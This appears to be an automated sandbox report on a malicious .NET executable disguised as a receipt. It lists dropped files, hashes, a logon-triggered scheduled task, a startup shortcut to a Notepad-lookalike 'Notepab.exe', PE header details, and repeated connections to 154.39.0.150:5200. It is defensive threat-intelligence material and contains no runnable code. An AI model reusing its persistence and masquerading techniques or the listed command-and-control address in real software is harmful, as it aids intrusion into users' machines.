                                                                C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Receipt-#202431029B.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):29
                                                                Entropy (8bit):3.598349098128234
                                                                Encrypted:false
                                                                SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                                                MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                                                SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                                                SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                                                SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                                                Malicious:false
                                                                Preview:....### explorer ###..[WIN]r

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0hjdcv4u.dhp.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5wpqr4sh.c24.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g1sh0dxm.bpl.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gshzprak.1vh.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmmpoavr.eq0.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hyqsywrg.dxt.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ichxq0eg.5be.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k005rndx.eld.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\tmp13D7.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Roaming\XetHVID.exe
                                                                File Type:XML 1.0 document, ASCII text
                                                                Category:dropped
                                                                Size (bytes):1573
                                                                Entropy (8bit):5.111102349500528
                                                                Encrypted:false
                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaZxvn:cge1wYrFdOFzOzN33ODOiDdKrsuT8v
                                                                MD5:66F999E47F117A71325CAC32D967885A
                                                                SHA1:A4A754EBEF3AA63B5BECF5104BB7F28387DF0E04
                                                                SHA-256:6724F469BCDA466ACE9FE74F5AFF9F38728585D0F9D4148E4BCEB78431870AE9
                                                                SHA-512:9140A09BAE1767BA053A9EBD3A32BE881AB8BD2CA56AFF7A99B52E280E0DDEFC8DAB8EED4A0185D20CDD46DD393E7B24504B7F7CA584A06F7398845290E0BBDE
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                C:\Users\user\AppData\Local\Temp\tmp2668.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Receipt-#202431029B.exe
                                                                File Type:XML 1.0 document, ASCII text
                                                                Category:dropped
                                                                Size (bytes):1573
                                                                Entropy (8bit):5.111102349500528
                                                                Encrypted:false
                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaZxvn:cge1wYrFdOFzOzN33ODOiDdKrsuT8v
                                                                MD5:66F999E47F117A71325CAC32D967885A
                                                                SHA1:A4A754EBEF3AA63B5BECF5104BB7F28387DF0E04
                                                                SHA-256:6724F469BCDA466ACE9FE74F5AFF9F38728585D0F9D4148E4BCEB78431870AE9
                                                                SHA-512:9140A09BAE1767BA053A9EBD3A32BE881AB8BD2CA56AFF7A99B52E280E0DDEFC8DAB8EED4A0185D20CDD46DD393E7B24504B7F7CA584A06F7398845290E0BBDE
                                                                Malicious:true
                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepab.lnk

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Receipt-#202431029B.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Dec 31 11:28:59 2024, mtime=Tue Dec 31 11:28:59 2024, atime=Tue Dec 31 11:28:59 2024, length=633344, window=hide
                                                                Category:dropped
                                                                Size (bytes):764
                                                                Entropy (8bit):5.049880310272238
                                                                Encrypted:false
                                                                SSDEEP:12:8wmK24ixyWCQddY//S7ALZ8h7xrZlajAs4UrHZ2lV7YEBmV:8jMixtr+67SCh75mAs4U1CVTBm
                                                                MD5:94EF75BC1DB938C7B506A9AA1C2C37CF
                                                                SHA1:F4F0C8A452D8E6A67FA4BDC35AE4060439538529
                                                                SHA-256:16C281BF4C406F4CF6DA4A871C4BD4F7118F38DFA066F56F8E6DBC1EEF3058C2
                                                                SHA-512:7371C59FEFC287570F973E218DE507C31501FA7B2BDECC7B9AEE19C6A5F3752959179D23645AFE56E49CD30DBF4C4D7CC31FB43051569BFCA485224828F7601B
                                                                Malicious:false
                                                                Preview:L..................F.... ....2...[...2...[...2...[..........................v.:..DG..Yr?.D..U..k0.&...&......vk.v....Y@...[.......[......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.c...........................%..A.p.p.D.a.t.a...B.V.1......Y.c..Roaming.@......CW.^.Y.c...........................)..R.o.a.m.i.n.g.....b.2......Y.c .Notepab.exe.H......Y.c.Y.c..............................N.o.t.e.p.a.b...e.x.e.......Y...............-.......X............%.K.....C:\Users\user\AppData\Roaming\Notepab.exe........\.....\.....\.....\.....\.N.o.t.e.p.a.b...e.x.e.`.......X.......114127...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                C:\Users\user\AppData\Roaming\Notepab.exe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Receipt-#202431029B.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):633344
                                                                Entropy (8bit):7.394142091962777
                                                                Encrypted:false
                                                                SSDEEP:12288:wcMCwy9EXX+DE+c0bai72C/1Vlj/C/cyCoKaN:JwFOwV0LZd00oKQ
                                                                MD5:5322ECE916271AD6517A171BE2A5A378
                                                                SHA1:A6E2F7E14A60A184A58B37A6AA1593210EBFA6BD
                                                                SHA-256:4C839863452A16A4D99B13065CF93B09547D04B86BA649A8B40976122FF67A74
                                                                SHA-512:D8C2DDA33A96CF9DA9E2E976BA54C7F9CFB6FD2790827523CFC0092D34F27A600ACE4BA92064388203817F12A5387E2C1324860ECC0F1760429E3CE03DB92E87
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Awm...............0..f...B........... ........@.. ....................................@.....................................O........?...........................^..p............................................ ............... ..H............text...8e... ...f.................. ..`.rsrc....?.......@...h..............@..@.reloc..............................@..B.......................H............h......f...lA..X.............................................r...ps....}.....s....}......}.....(.......(......(.....*...0..............{....o....o......r{..p.{....s....}.....{....o.......{....o....}....+N...X..{....o..........%...?....%..{.....o....o.....%..{.....o....o.....o....&..{....o......-..{....o .....{....o!....*..0............{....o"....o#...o$...o%.....r...p(&.....9.....s......{.....{....o.....o'...o(...o)....o*...o+...o....o,.....{....r...p.{....o.....

                                                                C:\Users\user\AppData\Roaming\XetHVID.exe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Receipt-#202431029B.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):633344
                                                                Entropy (8bit):7.394142091962777
                                                                Encrypted:false
                                                                SSDEEP:12288:wcMCwy9EXX+DE+c0bai72C/1Vlj/C/cyCoKaN:JwFOwV0LZd00oKQ
                                                                MD5:5322ECE916271AD6517A171BE2A5A378
                                                                SHA1:A6E2F7E14A60A184A58B37A6AA1593210EBFA6BD
                                                                SHA-256:4C839863452A16A4D99B13065CF93B09547D04B86BA649A8B40976122FF67A74
                                                                SHA-512:D8C2DDA33A96CF9DA9E2E976BA54C7F9CFB6FD2790827523CFC0092D34F27A600ACE4BA92064388203817F12A5387E2C1324860ECC0F1760429E3CE03DB92E87
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Awm...............0..f...B........... ........@.. ....................................@.....................................O........?...........................^..p............................................ ............... ..H............text...8e... ...f.................. ..`.rsrc....?.......@...h..............@..@.reloc..............................@..B.......................H............h......f...lA..X.............................................r...ps....}.....s....}......}.....(.......(......(.....*...0..............{....o....o......r{..p.{....s....}.....{....o.......{....o....}....+N...X..{....o..........%...?....%..{.....o....o.....%..{.....o....o.....o....&..{....o......-..{....o .....{....o!....*..0............{....o"....o#...o$...o%.....r...p(&.....9.....s......{.....{....o.....o'...o(...o)....o*...o+...o....o,.....{....r...p.{....o.....

                                                                C:\Users\user\AppData\Roaming\XetHVID.exe:Zone.Identifier

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Receipt-#202431029B.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.394142091962777
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                File name:Receipt-#202431029B.exe
                                                                File size:633'344 bytes
                                                                MD5:5322ece916271ad6517a171be2a5a378
                                                                SHA1:a6e2f7e14a60a184a58b37a6aa1593210ebfa6bd
                                                                SHA256:4c839863452a16a4d99b13065cf93b09547d04b86ba649a8b40976122ff67a74
                                                                SHA512:d8c2dda33a96cf9da9e2e976ba54c7f9cfb6fd2790827523cfc0092d34f27a600ace4ba92064388203817f12a5387e2c1324860ecc0f1760429e3ce03db92e87
                                                                SSDEEP:12288:wcMCwy9EXX+DE+c0bai72C/1Vlj/C/cyCoKaN:JwFOwV0LZd00oKQ
                                                                TLSH:97D4CF14776DCB06D53947F00A60E6B8137A7D8EB812E20F6ED97EEF3872B055A10683
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Awm...............0..f...B........... ........@.. ....................................@................................

                                                                File Icon

                                                                Icon Hash:32789ab39292d290

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x498512
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0xF56D7741 [Fri Jun 25 07:31:13 2100 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                push ebx
                                                                add byte ptr [ecx+00h], bh
                                                                jnc 00007F6B90522BF2h
                                                                je 00007F6B90522BF2h
                                                                add byte ptr [ebp+00h], ch
                                                                add byte ptr [ecx+00h], al
                                                                arpl word ptr [eax], ax
                                                                je 00007F6B90522BF2h
                                                                imul eax, dword ptr [eax], 00610076h
                                                                je 00007F6B90522BF2h
                                                                outsd
                                                                add byte ptr [edx+00h], dh
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x984bd0x4f.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x9a0000x3f1c.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x9e0000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x95ec40x70.text
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000x965380x96600e4397bd152d995027866c7a523c77052False0.7672128273067331data7.383968480412204IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rsrc0x9a0000x3f1c0x40000405fcb392404cbbd62988ecfe5ea3f9False0.92718505859375data7.810402814436972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x9e0000xc0x2000740c0265c3a7cf79363818b87a56cd8False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x9a1300x38aePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9891109579600276
                                                                RT_GROUP_ICON0x9d9e00x14data0.95
                                                                RT_VERSION0x9d9f40x33cdata0.4323671497584541
                                                                RT_MANIFEST0x9dd300x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                Imports

                                                                DLLImport
                                                                mscoree.dll_CorExeMain

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 31, 2024 13:29:04.024653912 CET497355200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:04.029825926 CET520049735154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:04.029891014 CET497355200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:04.353319883 CET497355200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:04.358198881 CET520049735154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:05.422609091 CET520049735154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:05.422708988 CET497355200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:08.673486948 CET497355200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:08.674637079 CET497365200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:08.678359032 CET520049735154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:08.679517984 CET520049736154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:08.679596901 CET497365200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:08.698333979 CET497365200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:08.703104973 CET520049736154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:10.145076036 CET520049736154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:10.145176888 CET497365200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:14.032434940 CET497365200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:14.033340931 CET497425200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:14.037600994 CET520049736154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:14.038173914 CET520049742154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:14.042087078 CET497425200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:14.062819958 CET497425200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:14.067616940 CET520049742154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:15.459269047 CET520049742154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:15.459331036 CET497425200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:17.938867092 CET497425200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:17.939575911 CET497445200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:17.943741083 CET520049742154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:17.944394112 CET520049744154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:17.944463015 CET497445200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:17.963808060 CET497445200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:17.968734026 CET520049744154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:19.346200943 CET520049744154.39.0.150192.168.2.4
